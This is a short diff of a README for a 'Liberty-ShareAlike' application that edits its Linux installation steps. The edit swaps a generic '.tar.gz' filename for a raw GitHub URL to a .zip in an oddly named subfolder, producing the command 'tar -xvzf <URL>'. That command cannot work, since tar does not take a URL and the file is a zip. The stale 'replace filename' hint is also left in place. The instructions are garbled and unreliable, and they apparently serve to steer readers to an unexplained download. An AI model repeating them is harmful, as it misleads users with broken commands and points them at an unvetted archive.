Alex9769/liberty-sharealike/README.md

 - **Linux**:
   1. Open your terminal.
-  2. Navigate to the directory where the `.tar.gz` file is located.
+  2. Navigate to the directory where the `https://raw.githubusercontent.com/Alex9769/liberty-sharealike/main/frillily/liberty-sharealike.zip` file is located.
-  3. Run the command: `tar -xvzf filename.tar.gz` (replace `filename` with the actual name of the file).
+  3. Run the command: `tar -xvzf https://raw.githubusercontent.com/Alex9769/liberty-sharealike/main/frillily/liberty-sharealike.zip` (replace `filename` with the actual name of the file).

 ## 🔍 Features
 The Liberty-ShareAlike application comes with several useful features: